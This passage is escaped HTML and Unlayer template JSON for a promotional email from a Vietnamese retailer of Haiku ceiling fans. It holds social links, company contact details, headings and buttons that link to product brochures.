align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.facebook.com\\/bigfans.vn\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/twitter.com\\/hgpco\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\" https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/squared\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">-------o0o------<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83c\\udf10 <a href=\\\"https:\\/\\/www.bigfans.vn\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83c\\udf10 <a href=\\\"https:\\/\\/quattran.co\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 19px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"91%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #616888;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #bbbbbb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":8,\\\"u_column\\\":15,\\\"u_content_text\\\":7,\\\"u_content_image\\\":13,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":3,\\\"u_content_heading\\\":5,\\\"u_content_text_deprecated\\\":1},\\\"body\\\":{\\\"id\\\":\\\"nY2UpNg7xs\\\",\\\"rows\\\":[{\\\"id\\\":\\\"CvMouKqZza\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"MIyWoeK0P3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wkMmc2BYL9\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502368565-logo_baf.png\\\",\\\"width\\\":445,\\\"height\\\":224,\\\"maxWidth\\\":\\\"26%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 22.4px;\\\\\\\"><strong><span style=\\\\\\\"font-family: Montserrat, sans-serif; line-height: 22.4px;\\\\\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1eeb Hoa K\\u1ef3.<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"gVPK2KUKnF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 26px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503530290-haiku-fans-residential-0.png\\\",\\\"width\\\":2000,\\\"height\\\":1000},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"CEyDphcpQ6\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Ki\\u1ec3u D\\u00e1ng Thi\\u1ebft K\\u1ebf Th\\u1ee7 C\\u00f4ng\\\"}},{\\\"id\\\":\\\"9BLYLfou98\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"35px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"Tho\\u1ea3i M\\u00e1i S\\u00e1ng T\\u1ea1o\\\"}},{\\\"id\\\":\\\"-K-i8ZxoiQ\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503040555-stock-templates1677136007974-haiku-finishes.jpg\\\",\\\"width\\\":1200,\\\"height\\\":1200},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"VyLcw40BDA\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h4\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"16px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_3\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#017ed0\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"2G9uTxQqI5\\\",\\\"cells\\\":[1,1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"6ubno4Pego\\\",\\\"contents\\\":[{\\\"id\\\":\\\"H9oT6H7xXx\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU H SERIES<\\/span>\\\",\\\"calculatedWidth\\\":143,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"8PkZJyt_vH\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jS1PqOS7Xl\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU I SERIES<\\/span>\\\",\\\"calculatedWidth\\\":137,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"6gueSe8f4h\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jWq9lKAUVa\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/L-series.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#2dc26b\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU L 